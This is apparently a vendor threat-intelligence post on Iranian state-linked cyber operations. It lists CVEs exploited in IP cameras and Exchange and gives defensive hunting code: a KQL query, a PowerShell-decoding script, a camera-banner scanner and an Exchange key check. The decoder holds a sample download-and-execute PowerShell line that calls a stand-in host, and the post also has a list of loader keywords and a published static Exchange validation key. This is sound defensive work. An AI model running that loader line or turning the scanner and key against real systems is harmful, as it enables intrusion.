In the complex landscape of geopolitical conflict, the digital battlefield often mirrors physical hostilities. Following the recent military operations known as Operation Epic Fury, cybersecurity researchers at Security Arsenal have observed a significant and alarming shift in Iranian cyber operations. We are witnessing a transition from "quiet" espionage-focused campaigns to loud, disruptive, and destructive hybrid offensives targeting Western, Israeli, and regional economic interests.
This post analyzes the escalation of Iranian Ministry of Intelligence and Security (MOIS) affiliated actors, specifically focusing on the tactics of MuddyWater and the Void Manticore persona (Handala), and the surge in exploitation targeting IP cameras.
The Shift: From Espionage to Destruction
Historically, Iranian-nexus threat actors have prioritized intelligence gathering and stealthy persistence. However, recent kinetic strikes appear to have triggered a retaliatory response where the gloves are coming off. The Tenable Research Special Operations (RSO) team reports that groups like MuddyWater are no longer content with simply watching; they are pre-positioning access for destructive outcomes.
We are seeing a "tag-team" approach:
- Initial Access Brokers (IABs): Groups like MuddyWater (aka Seedworm) infiltrate networks—targeting telecommunications, government bodies, and airports—establishing a foothold weeks before major military operations.
- Destructive Operators: Once data is exfiltrated, actors like Handala (Void Manticore) step in to wipe systems using custom wipers like BiBi Wiper and Cl Wiper.
A recent example includes the claim by Handala of a devastating attack on Stryker, a global medical technology firm. The group alleges the compromise of over 200,000 systems, including mobile devices via a compromised Microsoft Intune instance, and the theft of 50 terabytes of data.
The Criminal Veil: MOIS and RaaS Alliances
Attribution is becoming increasingly difficult as state-sponsored actors blur the lines with cybercrime. Recent intelligence suggests MOIS-affiliated groups are leveraging infrastructure from established cybercriminal gangs. Specifically, MuddyWater has been observed using infrastructure linked to Qilin, a notorious Ransomware-as-a-Service (RaaS) operator.
This collaboration serves two purposes:
- Obfuscation: It provides a layer of plausible deniability, making attribution tricky for defenders.
- Capability: It grants state actors access to mature, destructive tools typically found in the criminal underground.
IoT in the Crosshairs: Exploiting IP Cameras
Perhaps the most concerning development for critical infrastructure defenders is the surge in attacks against IP cameras. Iranian-nexus actors are actively targeting devices from Hikvision and Dahua.
While the motive may be surveillance for kinetic targeting or post-strike assessment, the compromise of these devices poses a severe risk to network integrity. Attackers are exploiting known vulnerabilities to gain a foothold in operational environments.
Critical CVEs Under Active Exploitation
Security Arsenal analysts recommend prioritizing patches for the following vulnerabilities, all of which carry critical CVSS scores and are being exploited in the wild:
- CVE-2025-34067 (Hikvision Integrated Security Management Platform) - CVSS 9.8
- CVE-2023-6895 (Hikvision Intercom Broadcasting System) - CVSS 9.8
- CVE-2021-36260 (Hikvision IP Camera Command Injection) - CVSS 9.8
- CVE-2021-33044 (Dahua Authentication Bypass) - CVSS 9.8
- CVE-2017-7921 (Hikvision IP Camera Improper Authentication) - CVSS 10.0
Additionally, two legacy vulnerabilities remain staples of their initial-access playbook: CVE-2017-11882 (the Microsoft Office Equation Editor memory-corruption bug, delivered through malicious documents) and CVE-2020-0688 (Microsoft Exchange Control Panel ViewState deserialization, which yields remote code execution to anyone holding a valid mailbox credential).
Detection and Threat Hunting
Defending against these sophisticated threats requires visibility into both endpoint activity and network traffic. Below are detection strategies and queries to help identify potential compromise or vulnerable assets.
1. Hunt for Suspicious PowerShell Activity (MuddyWater TTPs)
MuddyWater leans on PowerShell for execution and defense evasion, typically with -EncodedCommand so the script body never appears in plaintext on the command line. The query below (against DeviceProcessEvents, available in Defender for Endpoint advanced hunting and in Microsoft Sentinel through the Defender connector) finds encoded invocations, decodes the blob in-line so you can search the actual script, and pulls URLs out of the decoded text rather than the raw command line, where an encoded URL would never match.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe")
// -EncodedCommand and its accepted abbreviations (-e, -ec, -en, -enc) take a base64 blob of UTF-16LE text
| where ProcessCommandLine matches regex @"(?i)\s-e(c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/]{50,}={0,2}"
| extend Encoded = extract(@"(?i)\s-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/]{50,}={0,2})", 1, ProcessCommandLine)
// Best-effort decode: strip the interleaved NULs that UTF-16LE leaves behind (non-ASCII scripts decode to empty)
| extend Decoded = replace_regex(base64_decode_tostring(Encoded), @"\x00", "")
// URLs live in the decoded script, not in the base64 blob
| extend URLs = extract_all(@"https?://[^\s'""]+", Decoded)
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, ProcessCommandLine, Decoded, URLs
| order by Timestamp desc
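The same decode-then-inspect step, as an added Python example that is not part of the original post or of any vendor tooling, for teams that triage process-creation events outside of KQL. It decodes the UTF-16LE base64 blob the way powershell.exe does, then extracts URLs and flags download-and-execute keywords from the decoded script. The log lines, the SUSPICIOUS keyword list and the host name example.invalid (a reserved, non-routable name) are constructed for the example.

```python
"""Decode PowerShell -EncodedCommand blobs from process-creation log lines.

Added example (not code from the Security Arsenal post): PowerShell takes the
script as base64 over UTF-16LE text, so URL and keyword matching must run on
the decoded script, not on the raw command line. The log lines below are
constructed samples, and example.invalid is a reserved, non-routable name.
"""
import base64
import re
from typing import Optional

# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -en, -enc)
ENCODED_FLAG = re.compile(
    r"\s-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/]{16,}={0,2})", re.IGNORECASE
)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
# Download-and-execute primitives that loader scripts of this kind typically chain (assumed list)
SUSPICIOUS = (
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "invoke-webrequest", "frombase64string",
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script when cmdline carries an encoded command, else None."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    blob = match.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate blobs logged without their padding
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    try:
        return raw.decode("utf-16-le")  # what powershell.exe itself expects
    except UnicodeDecodeError:
        return raw.decode("utf-8", errors="replace")  # hand-rolled blobs from other tooling


def triage(cmdline: str) -> dict:
    """Decode if needed, then extract URLs and flag suspicious keywords from the script text."""
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    lowered = text.lower()
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "urls": URL_RE.findall(text),
        "keywords": [k for k in SUSPICIOUS if k in lowered],
    }


def encode_for_powershell(script: str) -> str:
    """Build a blob the way powershell.exe expects it; used here only to construct the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events, not real telemetry
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_EVENTS = [
    "powershell.exe -NoP -W Hidden -enc " + encode_for_powershell(SAMPLE_SCRIPT),
    "pwsh.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(triage(event))
```

The regex deliberately requires whitespace after the flag, so -ExecutionPolicy and -ErrorAction are not mistaken for -e; a blob that is valid base64 but was built from UTF-8 by third-party tooling still decodes as UTF-16LE without an error, so treat the decoded text as a hunting aid rather than ground truth.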
2. Identify Exposed or Vulnerable IP Cameras
You can use Bash with nmap and curl to sweep your local subnets for devices whose HTTP banner identifies them as Hikvision or Dahua, so they can be patched or segmented first. Banner matching is best-effort (many units return a generic Server header), so treat the result as a starting list to reconcile against your asset inventory, not as proof that a subnet is clean.
#!/bin/bash
# Scan a subnet for devices whose HTTP "Server:" banner identifies them as Hikvision or Dahua.
# Requires nmap and curl. Banner matching is best-effort: many units answer with a generic
# banner, so a miss means "unconfirmed", not "clean"; cross-check against the asset inventory.
SUBNET="${1:-192.168.1.0/24}"   # pass another range as the first argument
echo "Scanning $SUBNET for Hikvision and Dahua devices..."
# Grepable output gives one "Host: <ip> () Ports: 80/open/tcp//http///, ..." line per host with open ports
nmap -n -p 80,443,8000 --open "$SUBNET" -oG - | awk '/\/open\// {print $2}' | \
while read -r ip; do
    for url in "http://$ip:80/" "http://$ip:8000/" "https://$ip:443/"; do
        # HEAD request with a 2 s timeout; -k tolerates the self-signed certs cameras ship with
        header=$(curl -sk --max-time 2 -I "$url" | grep -i "^Server:")
        # Some firmware rejects HEAD, so retry with GET and keep only the response headers
        [ -z "$header" ] && header=$(curl -sk --max-time 2 -D - -o /dev/null "$url" | grep -i "^Server:")
        if echo "$header" | grep -qiE "hikvision|dahua"; then
            echo "[!] Hikvision/Dahua device found at $url (check firmware against the CVEs above)"
            echo "    Header: $header"
        fi
    done
done
3. PowerShell Check for Exchange Vulnerability (CVE-2020-0688)
The root cause of CVE-2020-0688 is that every unpatched Exchange installation shipped the same hard-coded ASP.NET <machineKey> in the ECP web.config, which lets any authenticated user forge a ViewState that deserializes into code execution; the fix installs a per-server key. The on-disk check is therefore to read the <machineKey> element and compare its validationKey with the well-known static value. The authoritative check remains the installed Exchange build and security update (Get-ExchangeServer | Format-Table Name, AdminDisplayVersion).
# CVE-2020-0688: unpatched Exchange installs all shipped the same hard-coded ASP.NET <machineKey>
# in the ECP web.config; the fix generates a per-server key. Compare the key on disk with the
# static value published in ZDI's CVE-2020-0688 write-up. Both the backend and the frontend
# proxy copies of the ECP web.config are checked.
$StaticValidationKey = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"
$Paths = @(
    "C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\web.config",
    "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\web.config"
)
foreach ($Path in $Paths) {
    if (-not (Test-Path $Path)) {
        Write-Host "[?] $Path not found on this host." -ForegroundColor Gray
        continue
    }
    [xml]$Config = Get-Content $Path -Raw
    $MachineKey = $Config.SelectSingleNode("//machineKey")
    if ($null -eq $MachineKey) {
        Write-Host "[?] $Path has no <machineKey> element; verify the installed security update instead." -ForegroundColor Cyan
    } elseif ($MachineKey.validationKey -ieq $StaticValidationKey) {
        Write-Host "[-] $Path still uses the static validationKey: VULNERABLE to CVE-2020-0688." -ForegroundColor Red
    } else {
        Write-Host "[+] $Path uses a non-default validationKey, as expected after patching." -ForegroundColor Green
    }
}
Mitigation Strategies
To defend against this heightened threat landscape, organizations should implement the following measures immediately:
- Patch Critical Vulnerabilities: Prioritize updating Hikvision and Dahua firmware to address the CVEs listed above. If patching is not immediately possible, place these devices behind a firewall with strict egress rules or disable their internet connectivity entirely.
- Network Segmentation: Ensure IoT devices (cameras) are on a separate VLAN from critical business systems and servers. Iranian actors often pivot from IoT to IT networks.
- Restrict Exchange Exposure: CVE-2020-0688 is triggered through the Exchange Control Panel (/ecp) and requires a valid mailbox credential, so beyond patching, keep /ecp off the internet, disable OWA (Outlook on the web) and other internet-facing Exchange services you do not use, and put MFA in front of the ones you keep. It remains a popular entry point.
- Audit MFA and Intune: In light of the Stryker claim, audit your Microsoft Entra ID (formerly Azure AD) and Intune configurations. A compromised Intune tenant can push wipe or retire actions to every enrolled device, so restrict Intune administrator roles, enforce strict Conditional Access (phishing-resistant MFA for admins), and alert on anomalous admin sign-ins and bulk device actions.
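One way to put the segmentation and egress rules above under detection, as an added Python example that is not code from the original post: given flow logs (NetFlow/IPFIX, firewall or VPC flow logs), flag every connection a camera initiates that is not on its short allowlist, and name the boundary it crosses. The camera VLAN, IT range, allowlist ports (including the VMS registration port) and the flow records are constructed placeholders for a real environment.

```python
"""Flag camera-initiated flows that leave the camera VLAN's allowed set.

Added example (not code from the Security Arsenal post): in a segmented design a
camera only ever initiates connections to a short allowlist (NTP/DNS on its
gateway, registration to the VMS), while the NVR/VMS and administrators connect
to the camera. Any other camera-initiated flow, above all one into the
corporate IT range, is the IoT-to-IT pivot the post warns about. The subnets,
ports and flow records below are constructed placeholders.
"""
import ipaddress
from collections import defaultdict

CAMERA_VLAN = ipaddress.ip_network("10.50.0.0/24")        # assumed camera subnet
IT_RANGES = [ipaddress.ip_network("10.10.0.0/16")]         # assumed corporate IT ranges
INTERNAL_RANGES = [ipaddress.ip_network("10.0.0.0/8")]     # anything outside is treated as internet
# (destination, port) pairs a camera is allowed to initiate; assumed for this site
ALLOWED_DESTS = {
    (ipaddress.ip_address("10.50.0.1"), 123),    # NTP on the VLAN gateway
    (ipaddress.ip_address("10.50.0.1"), 53),     # DNS on the VLAN gateway
    (ipaddress.ip_address("10.50.0.10"), 7660),  # assumed VMS registration endpoint
}

# Constructed flow records: (src, dst, dst_port, proto, bytes_from_src)
SAMPLE_FLOWS = [
    ("10.50.0.17", "10.50.0.1", 123, "udp", 180),
    ("10.50.0.17", "10.50.0.10", 7660, "tcp", 4_000),
    ("10.50.0.23", "10.10.4.15", 445, "tcp", 22_000),    # camera -> IT file server: pivot
    ("10.50.0.23", "203.0.113.9", 443, "tcp", 950_000),  # camera -> external host: exfil/C2 candidate
    ("10.50.0.23", "10.50.0.40", 80, "tcp", 600),        # camera -> another camera: lateral movement
    ("10.10.4.15", "10.50.0.23", 80, "tcp", 1_200),      # admin -> camera web UI: expected direction
]


def classify_destination(dst: ipaddress.IPv4Address) -> str:
    """Name the kind of boundary a disallowed camera flow crosses."""
    if any(dst in net for net in IT_RANGES):
        return "it_pivot"
    if not any(dst in net for net in INTERNAL_RANGES):
        return "internet_egress"
    return "unexpected_internal"


def find_pivots(flows):
    """Return one finding per camera-initiated flow that is not on the allowlist."""
    findings = []
    for src, dst, port, proto, nbytes in flows:
        src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
        if src_ip not in CAMERA_VLAN:
            continue  # inbound management and video pulls are the expected direction
        if (dst_ip, port) in ALLOWED_DESTS:
            continue
        findings.append({
            "camera": src, "dst": dst, "port": port, "proto": proto,
            "bytes": nbytes, "category": classify_destination(dst_ip),
        })
    return findings


def bytes_out_per_camera(findings):
    """Total bytes a camera pushed over disallowed flows; large totals point at exfiltration."""
    totals = defaultdict(int)
    for finding in findings:
        totals[finding["camera"]] += finding["bytes"]
    return dict(totals)


if __name__ == "__main__":
    hits = find_pivots(SAMPLE_FLOWS)
    for hit in hits:
        print(f"[{hit['category']}] {hit['camera']} -> {hit['dst']}:{hit['port']}/{hit['proto']} ({hit['bytes']} bytes)")
    print("bytes out over disallowed flows:", bytes_out_per_camera(hits))
```

The same allowlist doubles as the firewall policy for the camera VLAN: if a flow is not in ALLOWED_DESTS the firewall should have dropped it, so any finding here is also a check that the egress rules are actually enforced.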
Conclusion
The cyber fallout from Operation Epic Fury demonstrates the blurring lines between state-sponsored espionage, cybercrime, and physical warfare. Iranian actors are actively targeting critical infrastructure, technology companies, and healthcare sectors with destructive intent.
Security Arsenal continues to monitor these threats closely. We urge all organizations, especially those in the critical infrastructure sector, to assume compromise and actively hunt for the TTPs, vulnerable assets, and exposure points discussed above.